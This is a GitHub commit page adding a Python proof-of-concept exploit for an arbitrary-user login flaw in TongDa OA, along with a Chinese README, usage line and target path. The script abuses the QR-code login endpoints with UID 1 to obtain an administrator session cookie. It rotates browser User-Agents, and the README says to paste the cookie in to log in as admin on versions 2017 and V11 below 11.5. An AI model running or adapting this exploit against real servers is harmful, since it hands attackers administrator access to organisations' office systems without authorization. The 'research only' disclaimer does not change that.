Skip to content

Commit 785a3cc

Browse files
authoredJan 13, 2022
添加通达OA 漏洞利用exp
1 parent f1b09b0 commit 785a3cc

File tree

4 files changed

+128
-0
lines changed

4 files changed

+128
-0
lines changed
 

‎01-通达OA/POC.py

+113
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,113 @@
1+
'''
2+
@Author : Sp4ce
3+
@Date : 2020-03-17 23:42:16
4+
@LastEditors : Sp4ce
5+
@LastEditTime : 2020-04-22 16:24:52
6+
@Description : Challenge Everything.
7+
'''
8+
import requests
9+
from random import choice
10+
import argparse
11+
import json
12+
13+
USER_AGENTS = [
14+
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
15+
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
16+
"Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
17+
"Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
18+
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
19+
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
20+
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
21+
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
22+
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
23+
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
24+
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
25+
"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
26+
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
27+
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
28+
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
29+
"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
30+
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
31+
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
32+
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
33+
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
34+
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
35+
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
36+
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
37+
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
38+
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
39+
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
40+
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
41+
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
42+
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
43+
"Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
44+
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
45+
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
46+
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
47+
"Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
48+
]
49+
50+
headers={}
51+
52+
def getV11Session(url):
53+
checkUrl = url+'/general/login_code.php'
54+
try:
55+
headers["User-Agent"] = choice(USER_AGENTS)
56+
res = requests.get(checkUrl,headers=headers)
57+
resText = str(res.text).split('{')
58+
codeUid = resText[-1].replace('}"}', '').replace('\r\n', '')
59+
getSessUrl = url+'/logincheck_code.php'
60+
res = requests.post(
61+
getSessUrl, data={'CODEUID': '{'+codeUid+'}', 'UID': int(1)},headers=headers)
62+
print('[+]Get Available COOKIE:'+res.headers['Set-Cookie'])
63+
except:
64+
print('[-]Something Wrong With '+url)
65+
66+
67+
68+
def get2017Session(url):
69+
checkUrl = url+'/ispirit/login_code.php'
70+
try:
71+
headers["User-Agent"] = choice(USER_AGENTS)
72+
res = requests.get(checkUrl,headers=headers)
73+
resText = json.loads(res.text)
74+
codeUid = resText['codeuid']
75+
codeScanUrl = url+'/general/login_code_scan.php'
76+
res = requests.post(codeScanUrl, data={'codeuid': codeUid, 'uid': int(
77+
1), 'source': 'pc', 'type': 'confirm', 'username': 'admin'},headers=headers)
78+
resText = json.loads(res.text)
79+
status = resText['status']
80+
if status == str(1):
81+
getCodeUidUrl = url+'/ispirit/login_code_check.php?codeuid='+codeUid
82+
res = requests.get(getCodeUidUrl)
83+
print('[+]Get Available COOKIE:'+res.headers['Set-Cookie'])
84+
else:
85+
print('[-]Something Wrong With '+url + ' Maybe Not Vulnerable ?')
86+
except:
87+
print('[-]Something Wrong With '+url)
88+
89+
90+
if __name__ == "__main__":
91+
parser = argparse.ArgumentParser()
92+
parser.add_argument(
93+
"-v",
94+
"--tdoaversion",
95+
type=int,
96+
choices=[11, 2017],
97+
help="Target TongDa OA Version. e.g: -v 11、-v 2017")
98+
parser.add_argument(
99+
"-url",
100+
"--targeturl",
101+
type=str,
102+
help="Target URL. e.g: -url 192.168.2.1、-url http://192.168.2.1"
103+
)
104+
args = parser.parse_args()
105+
url = args.targeturl
106+
if 'http://' not in url:
107+
url = 'http://' + url
108+
if args.tdoaversion == 11:
109+
getV11Session(url)
110+
elif args.tdoaversion == 2017:
111+
get2017Session(url)
112+
else:
113+
parser.print_help()

‎01-通达OA/README.md

+13
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,13 @@
1+
# TongDaOA-Fake-User
2+
通达OA 前台任意用户登录漏洞
3+
4+
**仅供安全研究,禁止非法利用!**
5+
6+
# 使用方法
7+
1. python3 poc.py -v 版本 -url url
8+
2. 运行并获取到可用的SESSIONID
9+
3. 替换浏览器Cookie中的SESSIONID即可实现登录为admin
10+
11+
# 影响范围
12+
13+
**通达OA2017、V11.X<V11.5**

‎01-通达OA/用法.txt

+1
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
python3 POC.py -v 2017 -url 192.168.2.1

‎01-通达OA/路径.txt

+1
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
/general/index.php

0 commit comments

Comments
 (0)
Please sign in to comment.